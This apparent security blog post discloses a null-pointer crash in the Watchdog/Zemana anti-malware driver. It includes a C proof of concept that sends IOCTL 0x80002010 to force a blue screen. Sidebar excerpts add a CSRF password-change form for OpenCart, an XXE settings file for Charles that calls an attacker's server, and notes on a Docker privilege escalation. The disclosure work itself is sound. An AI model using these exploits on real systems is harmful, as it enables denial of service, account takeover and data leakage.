Watchdog Anti-Malware Null Pointer Reference Vulnerability

0x00  fuzz
      
     1.https://www.watchdogdevelopment.com/ Download the latest version for testing
      Software version2.74.186.426
      Driver version2.74.0.259
    


   2.Static analysis of the driver module to find the IRP processing function
   

   3.Perform fuzz test on the 80002010 control code, and the system generates BSOD
   



0x01 Vulnerability analysis
    
   1.Here I use the tools I wrote to assist analysis. IRP functions are hooked through the rva and drivers of the passed in IRP function.
   

    

  2.Re-do fuzz, it will break into the MyIrpFun function, step by step here, through the help tool can be seen that the incoming buff is empty (the first fuzz fill 0x41, the second fuzz is filled with 0)

  

  

  3.Keep single step and quickly reach the place where you refer to the null pointer

  

 

 Since the buf passed in from the ring3 layer does not determine whether it is empty, the content of the null pointer is directly accessed in the function, resulting in a local denial of service.


0x02 poc
   int main()
{
DWORD retLen;
HANDLE hDevice = CreateFileW(L"\\\\.\\ZemanaAntiMalware", GENERIC_ALL, 0, 0, OPEN_EXISTING, 0, 0);

if (hDevice == INVALID_HANDLE_VALUE)
{
return -1;
}
else
{
printf("Open ok\n");
}

DeviceIoControl(hDevice, 0x80002010, 0, 0, 0, 0, &retLen, 0);

printf("BSOD!");
system("pause");
}

评论

发表评论

此博客中的热门博文

Opencart-v3-0-3-0 user changes password at csrf vulnerability

图片
Software Link: https://github.com/opencart/opencart/ Date: 06.28.2018 Exploit Author:CK01 Version:<= V3-0-3-0 0x00 Vulnerability analysis       The user token was not verified at the password change, causing the csrf vulnerability to modify the user password  /upload/catalog/controller/account/password.php 0x01 Exploit Save the following exp as html and open the run <html>   <body>     <form id="post123" name="post123" action="http://192.168.0.46/opencart/index.php?route=account/password&language=en-gb" method="POST" enctype="multipart/form-data">   <input type="hidden" name="password" value="CK01ck01" />       <input type="hidden" name="confirm" value="CK01ck01" /> <script>         document.getElementById('post123').submit();  </script>     </form>   </body> </html>
阅读全文

Charles 4.2.7 XML External Entity

图片
Software Link: https://www.charlesproxy.com Date:11.12.2018 Exploit Author:CK01 Version:<=4.2.7 Security Issue: The XML External Entity vulnerability exists in the Charles import/export setup option. If the user imports the "Charles Settings.xml" of the attacker, the internal network may be detected and the information may be leaked. POC: 1.Charles Setting.xml:(127.0.0.1 -> attacker's server ) <?xml version='1.0' encoding='UTF-8' ?> <?charles serialisation-version='2.0' ?> <!DOCTYPE data [ <!ENTITY file SYSTEM "jar:http://127.0.0.1:2014/!/">]> <charles-export> <proxyConfiguration> <enableSOCKSProxy>false</enableSOCKSProxy> <dynamicHTTPPort>false</dynamicHTTPPort> <dynamicSOCKSPort>false</dynamicSOCKSPort> <enableSOCKSTransparentHTTPProxying>true</enableSOCKSTransparentHTTPProxying> <port>8888</port>
阅读全文

Docker's latest version of privilege escalation vulnerability

图片
0x00 Vulnerability analysis 1.com.docker.vmnetd is a launch service that runs at root authority; communicates with the client (Docker) through a local socket; after analysis, it is found that the client is not verified during the communication process, resulting in the risk of elevated permissions 2. The two main functions in main_handle are vmnet_handshake_Perform and vmnetd_commands_Handle; vmnet_handshake_Perform function mainly initializes the message and obtains the corresponding client command. vmnetd_commands_Handle function calls the corresponding callback function according to the obtained command 2.1 vmnet_handshake_Perform 2.1.1 First obtain the initialization message (3 packets) requested by the client through vmnet_handshake_readInitMessage. The message structure is as follows packet-1: flag c00009a318  56 4d 4e 33 54 00 00 00 00 00 00 00 00 00 00 00  VMN3T........... c00009a328  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................ packet-2:versi
阅读全文